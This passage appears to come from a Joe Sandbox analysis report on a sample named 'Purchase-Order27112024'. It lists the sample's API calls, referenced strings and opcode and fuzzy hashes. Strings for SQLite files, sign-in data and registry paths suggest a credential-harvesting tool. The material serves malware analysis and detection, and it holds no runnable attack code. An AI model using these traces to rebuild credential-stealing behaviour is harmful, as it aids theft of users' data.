                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memset$ClassCtrlNameTextWindow_itow_wcsicmp
                                                                                                      • String ID: sysdatetimepick32
                                                                                                      • API String ID: 1028950076-4169760276
                                                                                                      • Opcode ID: dc1af48194af82a98770d28407c75daa8b541611d8ddf07168db58443698622d
                                                                                                      • Instruction ID: 7fefccf0184427ff86f81c2eca1e08be5bb75bf3b76f29e65549559b88306b24
                                                                                                      • Opcode Fuzzy Hash: dc1af48194af82a98770d28407c75daa8b541611d8ddf07168db58443698622d
                                                                                                      • Instruction Fuzzy Hash: 061177769002197AEB10EB91DC49EDF7BACEF05750F0040BAF508D2192EB749A85CA59
                                                                                                      APIs
                                                                                                      • memcpy.MSVCRT(00000000,00000000,00000000,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B911
                                                                                                      • memcpy.MSVCRT(?,00000000,00000000,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B923
                                                                                                      • memcpy.MSVCRT(?,-journal,00000008,?,?,?,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B93B
                                                                                                      • memcpy.MSVCRT(?,00000000,00000000,?,?,?,?,?,?,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B958
                                                                                                      • memcpy.MSVCRT(?,-wal,00000004,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 0041B970
                                                                                                      • memset.MSVCRT ref: 0041BA3D
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memcpy$memset
                                                                                                      • String ID: -journal$-wal
                                                                                                      • API String ID: 438689982-2894717839
                                                                                                      • Opcode ID: 441d401f2ecb898c8727535c1be97301f1c9a11951b4995e9674cbf0a45d1870
                                                                                                      • Instruction ID: 9370885b9bf0560d7aa4477d28ce4586d78acc2621466e64c0ac2b95c9c5353a
                                                                                                      • Opcode Fuzzy Hash: 441d401f2ecb898c8727535c1be97301f1c9a11951b4995e9674cbf0a45d1870
                                                                                                      • Instruction Fuzzy Hash: CBA1EFB1A04606EFCB14DF69C8417DAFBB4FF04314F14826EE46897381D738AA95CB99
                                                                                                      APIs
                                                                                                      • GetDlgItem.USER32(?,000003E9), ref: 00405C27
                                                                                                      • GetDlgItem.USER32(?,000003E9), ref: 00405C3A
                                                                                                      • GetDlgItem.USER32(?,000003E9), ref: 00405C4F
                                                                                                      • GetDlgItem.USER32(?,000003E9), ref: 00405C67
                                                                                                      • EndDialog.USER32(?,00000002), ref: 00405C83
                                                                                                      • EndDialog.USER32(?,00000001), ref: 00405C98
                                                                                                        • Part of subcall function 00405942: GetDlgItem.USER32(?,000003E9), ref: 0040594F
                                                                                                        • Part of subcall function 00405942: GetDlgItemInt.USER32(?,000003ED,00000000,00000000), ref: 00405964
                                                                                                      • SendDlgItemMessageW.USER32(?,000003ED,000000C5,00000003,00000000), ref: 00405CB0
                                                                                                      • SetDlgItemInt.USER32(?,000003ED,?,00000000), ref: 00405DC1
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Item$Dialog$MessageSend
                                                                                                      • String ID:
                                                                                                      • API String ID: 3975816621-0
                                                                                                      • Opcode ID: 7732dd923fe157b610bb283d6cbae8fba396a65a3534e092655bb2fc554de655
                                                                                                      • Instruction ID: f402ee7b04c6f37fed0081192b7321ff61b10a2f1b35431ffb531e22b2ae6a97
                                                                                                      • Opcode Fuzzy Hash: 7732dd923fe157b610bb283d6cbae8fba396a65a3534e092655bb2fc554de655
                                                                                                      • Instruction Fuzzy Hash: CC61C130214B05ABEB21AF25C886A2BB7B9FF40314F00C63EF515A76D1D778A980CF59
                                                                                                      APIs
                                                                                                      • _wcsicmp.MSVCRT ref: 00444D09
                                                                                                      • _wcsicmp.MSVCRT ref: 00444D1E
                                                                                                      • _wcsicmp.MSVCRT ref: 00444D33
                                                                                                        • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                                                                                                        • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                                                                                                        • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _wcsicmp$wcslen$_memicmp
                                                                                                      • String ID: .save$http://$https://$log profile$signIn
                                                                                                      • API String ID: 1214746602-2708368587
                                                                                                      • Opcode ID: eb43a17493a81dd81a499902e520f22142985c343e331a56dc5f09596e4914e7
                                                                                                      • Instruction ID: a06b7041105a35739b636013fb05be6f811b580b4b6be30494b1fb5d54fb6444
                                                                                                      • Opcode Fuzzy Hash: eb43a17493a81dd81a499902e520f22142985c343e331a56dc5f09596e4914e7
                                                                                                      • Instruction Fuzzy Hash: CF41E6F25047018AF730AA65988176773C8DBD4329F20893FE466E27C3DB7CE841451D
                                                                                                      APIs
                                                                                                      • ??2@YAPAXI@Z.MSVCRT(0000000C), ref: 00405DE1
                                                                                                      • ??3@YAXPAX@Z.MSVCRT(00000000), ref: 00405DFD
                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000000,?), ref: 00405E23
                                                                                                      • memset.MSVCRT ref: 00405E33
                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000000,?), ref: 00405E62
                                                                                                      • InvalidateRect.USER32(?,00000000,00000000,?,?,?,?), ref: 00405EAF
                                                                                                      • SetFocus.USER32(?,?,?,?), ref: 00405EB8
                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?), ref: 00405EC8
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ??2@$??3@$FocusInvalidateRectmemset
                                                                                                      • String ID:
                                                                                                      • API String ID: 2313361498-0
                                                                                                      • Opcode ID: 714c78ee16b9d0c535b2ccd9b722d7140f358af2491426836a426c957dcc8526
                                                                                                      • Instruction ID: b0df241c53c05d00948b57b0581abff4a91b8671001b7eb205ccc6b71985861b
                                                                                                      • Opcode Fuzzy Hash: 714c78ee16b9d0c535b2ccd9b722d7140f358af2491426836a426c957dcc8526
                                                                                                      • Instruction Fuzzy Hash: F231C1B1500601AFEB249F6AD88692AB7A8FF14344B11853FF545E72A0DB38ED90CFD4
                                                                                                      APIs
                                                                                                      • GetClientRect.USER32(?,?), ref: 00405F65
                                                                                                      • GetWindow.USER32(?,00000005), ref: 00405F7D
                                                                                                      • GetWindow.USER32(00000000), ref: 00405F80
                                                                                                        • Part of subcall function 00401739: GetWindowRect.USER32(?,?), ref: 00401748
                                                                                                      • GetWindow.USER32(00000000,00000002), ref: 00405F8C
                                                                                                      • GetDlgItem.USER32(?,0000040C), ref: 00405FA2
                                                                                                      • SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 00405FE1
                                                                                                      • GetDlgItem.USER32(?,0000040E), ref: 00405FEB
                                                                                                      • SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 0040603A
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Window$ItemMessageRectSend$Client
                                                                                                      • String ID:
                                                                                                      • API String ID: 2047574939-0
                                                                                                      • Opcode ID: e98f1b8ec4c98c4b3f876b541513d14ca347a33c497b9d7b5490fbbe5922d292
                                                                                                      • Instruction ID: 7069056512839d5548a4ade768bb81bcd5f8c043aef79b83aaef118172e1f21b
                                                                                                      • Opcode Fuzzy Hash: e98f1b8ec4c98c4b3f876b541513d14ca347a33c497b9d7b5490fbbe5922d292
                                                                                                      • Instruction Fuzzy Hash: 3421A4B1B4070977E60137629C47F7B666CEF95718F04003AFB007F1C2DABA5C0649A9
                                                                                                      APIs
                                                                                                      • GetSystemTime.KERNEL32(?), ref: 00418836
                                                                                                      • memcpy.MSVCRT(?,?,00000010), ref: 00418845
                                                                                                      • GetCurrentProcessId.KERNEL32 ref: 00418856
                                                                                                      • memcpy.MSVCRT(?,?,00000004), ref: 00418869
                                                                                                      • GetTickCount.KERNEL32 ref: 0041887D
                                                                                                      • memcpy.MSVCRT(?,?,00000004), ref: 00418890
                                                                                                      • QueryPerformanceCounter.KERNEL32(?), ref: 004188A6
                                                                                                      • memcpy.MSVCRT(?,?,00000008), ref: 004188B6
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memcpy$CountCounterCurrentPerformanceProcessQuerySystemTickTime
                                                                                                      • String ID:
                                                                                                      • API String ID: 4218492932-0
                                                                                                      APIs
                                                                                                        • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6EB
                                                                                                        • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6FB
                                                                                                        • Part of subcall function 0044A6E0: memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,?,?,00000000), ref: 0044A75D
                                                                                                        • Part of subcall function 0044A6E0: memcpy.MSVCRT(?,?,?,?,?,00000000,?,?,00000000), ref: 0044A7AA
                                                                                                      • memcpy.MSVCRT(?,?,00000040), ref: 0044A8BF
                                                                                                      • memcpy.MSVCRT(?,?,00000004,00000000), ref: 0044A90C
                                                                                                      • memcpy.MSVCRT(?,?,00000040), ref: 0044A988
                                                                                                        • Part of subcall function 0044A3F0: memcpy.MSVCRT(?,0044A522,00000040,?,?,?,0044A522,?,?,?,?,0044A93F,?,?,?,00000000), ref: 0044A422
                                                                                                        • Part of subcall function 0044A3F0: memcpy.MSVCRT(?,0044A522,00000008,?,?,?,0044A522,?,?,?,?,0044A93F,?,?,?,00000000), ref: 0044A46E
                                                                                                      • memcpy.MSVCRT(?,?,00000000), ref: 0044A9D8
                                                                                                      • memcpy.MSVCRT(?,?,00000020,?,?,?,?,00000000), ref: 0044AA19
                                                                                                      • memcpy.MSVCRT(00000000,?,00000020,?,?,?,?,?,?,?,00000000), ref: 0044AA4A
                                                                                                      Similarity
                                                                                                      • API ID: memcpy$memset
                                                                                                      • String ID: gj
                                                                                                      • API String ID: 438689982-4203073231
                                                                                                      APIs
                                                                                                      • memcpy.MSVCRT(00000000,?,00000000,00000000,00000000), ref: 00430D77
                                                                                                      Similarity
                                                                                                      • API ID: memcpy
                                                                                                      • String ID: $, $CREATE TABLE $h\E$h\E$t\El\E
                                                                                                      • API String ID: 3510742995-2446657581
                                                                                                      APIs
                                                                                                      • GetDlgItem.USER32(?,000003E9), ref: 00405A25
                                                                                                      • SendMessageW.USER32(00000000,00001009,00000000,00000000), ref: 00405A3E
                                                                                                      • SendMessageW.USER32(?,00001036,00000000,00000026), ref: 00405A4B
                                                                                                      • SendMessageW.USER32(?,0000101C,00000000,00000000), ref: 00405A57
                                                                                                      • memset.MSVCRT ref: 00405ABB
                                                                                                      • SendMessageW.USER32(?,0000105F,?,?), ref: 00405AF0
                                                                                                      • SetFocus.USER32(?), ref: 00405B76
                                                                                                      Similarity
                                                                                                      • API ID: MessageSend$FocusItemmemset
                                                                                                      • String ID:
                                                                                                      • API String ID: 4281309102-0
                                                                                                      APIs
                                                                                                      Similarity
                                                                                                      • API ID: _snwprintfwcscat
                                                                                                      • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                                                                                                      • API String ID: 384018552-4153097237
                                                                                                      APIs
                                                                                                      Similarity
                                                                                                      • API ID: ItemMenu$CountInfomemsetwcschr
                                                                                                      • String ID: 0$6
                                                                                                      • API String ID: 2029023288-3849865405
                                                                                                      APIs
                                                                                                        • Part of subcall function 004055A4: GetLastError.KERNEL32(?,00000000,00405522,?,?,?,00000000,00000000,?,00408E1C,?,?,00000060,00000000), ref: 004055B9
                                                                                                      • memset.MSVCRT ref: 00405455
                                                                                                      • memset.MSVCRT ref: 0040546C
                                                                                                      • memset.MSVCRT ref: 00405483
                                                                                                      • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00405498
                                                                                                      • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004054AD
                                                                                                      Similarity
                                                                                                      • API ID: memset$memcpy$ErrorLast
                                                                                                      • String ID: 6$\
                                                                                                      • API String ID: 404372293-1284684873
                                                                                                      APIs
                                                                                                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A088
                                                                                                      • GetDateFormatW.KERNEL32(00000400,00000001,000007C1,00000000,?,00000080), ref: 0040A0B4
                                                                                                      • GetTimeFormatW.KERNEL32(00000400,00000000,000007C1,00000000,?,00000080), ref: 0040A0C9
                                                                                                      • wcscpy.MSVCRT ref: 0040A0D9
                                                                                                      • wcscat.MSVCRT ref: 0040A0E6
                                                                                                      • wcscat.MSVCRT ref: 0040A0F5
                                                                                                      • wcscpy.MSVCRT ref: 0040A107
                                                                                                      Similarity
                                                                                                      • API ID: Time$Formatwcscatwcscpy$DateFileSystem
                                                                                                      • String ID:
                                                                                                      • API String ID: 1331804452-0
                                                                                                      APIs
                                                                                                        • Part of subcall function 0040440C: FreeLibrary.KERNEL32(?,0040436D,00000000,00000000,?,0040BDCC,?,00000000,?), ref: 00404414
                                                                                                        • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                        • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                                                                        • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                        • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                        • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                                                                        • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                      • GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                                                                                                      • GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                                                                                                      • GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                                                                                                      • GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                                                                                                      • GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                                                                                                      Similarity
                                                                                                      • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                                                                                                      • String ID: advapi32.dll
                                                                                                      • API String ID: 2012295524-4050573280
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      • <?xml version="1.0" ?>, xrefs: 0041007C
                                                                                                      • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 00410083
                                                                                                      • <%s>, xrefs: 004100A6
                                                                                                      Similarity
                                                                                                      • API ID: memset$_snwprintf
                                                                                                      • String ID: <%s>$<?xml version="1.0" ?>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                                                                                                      • API String ID: 3473751417-2880344631
                                                                                                      • Opcode ID: 2b06e63593618d13b5a5b8efcda018c795261ff0c1630acf280f9998f6f819b8
                                                                                                      • Instruction ID: 2862698e7f89dc449948c814091faf4507903f68b21858a7dbdf66e33a92e1a6
                                                                                                      • Opcode Fuzzy Hash: 2b06e63593618d13b5a5b8efcda018c795261ff0c1630acf280f9998f6f819b8
                                                                                                      • Instruction Fuzzy Hash: F501C8F2E402197BD720AA559C41FEAB6ACEF48345F0040B7B608B3151D6389F494B99
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: wcscat$_snwprintfmemset
                                                                                                      • String ID: %2.2X
                                                                                                      • API String ID: 2521778956-791839006
                                                                                                      • Opcode ID: 31c2c2b958cbfb7d79e881a69437bc30ebdfa5a8327fe047e8a0291744cff554
                                                                                                      • Instruction ID: 672bbb69153a15f1984629f72f86def8939f314c78adde6f8276b735d3b02408
                                                                                                      • Opcode Fuzzy Hash: 31c2c2b958cbfb7d79e881a69437bc30ebdfa5a8327fe047e8a0291744cff554
                                                                                                      • Instruction Fuzzy Hash: 2101D472A403297AF7206756AC46BBA33ACAB41714F11407BFC14AA1C2EA7C9A54469A
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _snwprintfwcscpy
                                                                                                      • String ID: dialog_%d$general$menu_%d$strings
                                                                                                      • API String ID: 999028693-502967061
                                                                                                      • Opcode ID: 80a89c9967db9934379ab2cd2962a5087f7f7915bf37897dca38dc6723802d56
                                                                                                      • Instruction ID: 4b5f4d23dee208ad245a1fa3262b8d520e9fbefe09054bf07968a47f6ed58b46
                                                                                                      • Opcode Fuzzy Hash: 80a89c9967db9934379ab2cd2962a5087f7f7915bf37897dca38dc6723802d56
                                                                                                      • Instruction Fuzzy Hash: 1AE04FB5E8870035E92519A10C03B2A155086A6B5BF740C2BFD0AB11D2E47F955DA40F
                                                                                                      APIs
                                                                                                      • strlen.MSVCRT ref: 00408DFA
                                                                                                        • Part of subcall function 00408D18: memcpy.MSVCRT(?,?,00000008,00000008,00000010,00000040,?,?), ref: 00408D44
                                                                                                      • memset.MSVCRT ref: 00408E46
                                                                                                      • memcpy.MSVCRT(00000000,?,?,00000000,00000000,00000000), ref: 00408E59
                                                                                                      • memcpy.MSVCRT(?,?,?,?,?,?,00000000,00000000,00000000), ref: 00408E6C
                                                                                                      • memcpy.MSVCRT(00000000,00000000,00000014,?,00000000,?,?,00000000,?,00000000,00000000,?,00000000), ref: 00408EB2
                                                                                                      • memcpy.MSVCRT(?,?,?,00000000,?,00000000,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00408EC5
                                                                                                      • memcpy.MSVCRT(00000000,00000000,00000014,?,00000000,00000000,00000060,00000000,?,?,?,00000000,?,00000000), ref: 00408EF2
                                                                                                      • memcpy.MSVCRT(?,00000000,00000014,00000000,00000060,00000000,?,?,?,00000000,?,00000000), ref: 00408F07
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memcpy$memsetstrlen
                                                                                                      • String ID:
                                                                                                      • API String ID: 2350177629-0
                                                                                                      • Opcode ID: 5b01e9cdb19858cbca659f92b0ea30b8779096e26500951ee762ba1ee29ea98e
                                                                                                      • Instruction ID: 5f65aa9fdfa02acdbc3988aed820739efb0bf546d233f5e01752542f466a415e
                                                                                                      • Opcode Fuzzy Hash: 5b01e9cdb19858cbca659f92b0ea30b8779096e26500951ee762ba1ee29ea98e
                                                                                                      • Instruction Fuzzy Hash: 3951017290050DBEEB51DAE8CC45FEFBBBCAB09304F004476F709E6155E6349B498BA6
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memset
                                                                                                      • String ID: 8$GROUP$ORDER$a GROUP BY clause is required before HAVING$aggregate functions are not allowed in the GROUP BY clause
                                                                                                      • API String ID: 2221118986-1606337402
                                                                                                      • Opcode ID: f99636ea185a13f681f6ed3553038105d2c4243f795332ddfde7f7b33e8689c4
                                                                                                      • Instruction ID: 7aef5b05df8cb417835a49add62511a3dd126d480fa81acd131143259a3eb597
                                                                                                      • Opcode Fuzzy Hash: f99636ea185a13f681f6ed3553038105d2c4243f795332ddfde7f7b33e8689c4
                                                                                                      • Instruction Fuzzy Hash: 5D818A706083219FDB10CF25E48162BB7E1EF84318F96885EEC949B256D738EC55CB9B
                                                                                                      APIs
                                                                                                      • _mbscpy.MSVCRT(?,00000000,00000000,?,00000001), ref: 00408F50
                                                                                                      • memcmp.MSVCRT(?,?,00000010,0040951D,?,?,?,?,00000010,?,00000000,?,00000001), ref: 00408FB3
                                                                                                      • memset.MSVCRT ref: 00408FD4
                                                                                                      • memcmp.MSVCRT(?,?,00000010,0040951D,?,?,00000010,?,00000000,?,00000001), ref: 00409025
                                                                                                      • memset.MSVCRT ref: 00409042
                                                                                                      • memcpy.MSVCRT(?,?,00000018,00000001,?,?,00000020,?,?,?,?,00000000,?,00000001), ref: 00409079
                                                                                                        • Part of subcall function 00408C3C: strlen.MSVCRT ref: 00408C96
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memcmpmemset$_mbscpymemcpystrlen
                                                                                                      • String ID:
                                                                                                      • API String ID: 265355444-0
                                                                                                      • Opcode ID: 28e2d425d257f258de9af60d97ecb42603b9b505b60f53e6cc20d6bda128ffa8
                                                                                                      • Instruction ID: d0ac777748d33e6673793c59e161d6f76d61048b6b1b65ce46f59eb5e56095ce
                                                                                                      • Opcode Fuzzy Hash: 28e2d425d257f258de9af60d97ecb42603b9b505b60f53e6cc20d6bda128ffa8
                                                                                                      • Instruction Fuzzy Hash: E241677190060CBEEB21DAA0DC45FDFB7BCAF04344F00443EF655E6182E675AA498BA5
                                                                                                      APIs
                                                                                                        • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1AE
                                                                                                        • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1B6
                                                                                                        • Part of subcall function 00414592: RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                                                                                                        • Part of subcall function 0040A9CE: free.MSVCRT ref: 0040A9DD
                                                                                                      • memset.MSVCRT ref: 0040C439
                                                                                                      • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                                                                                      • _wcsupr.MSVCRT ref: 0040C481
                                                                                                        • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                                        • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                                                        • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                                                        • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000001,?,00000000,?,?,0040AD76,?,000000FF), ref: 0040A94F
                                                                                                      • memset.MSVCRT ref: 0040C4D0
                                                                                                      • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                                                                                      • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000,?), ref: 0040C508
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: free$EnumValuememset$CloseOpen_wcsuprmemcpywcslen
                                                                                                      • String ID:
                                                                                                      • API String ID: 4131475296-0
                                                                                                      • Opcode ID: f8fc55ba245d1c9f6a3ba6cb2a4711690556c3657263a09b0baeb8372baa9e99
                                                                                                      • Instruction ID: d2440758a7fd93b52fc88bd6111275bc9aa4df1ffeb01c53d5483546710cd2f3
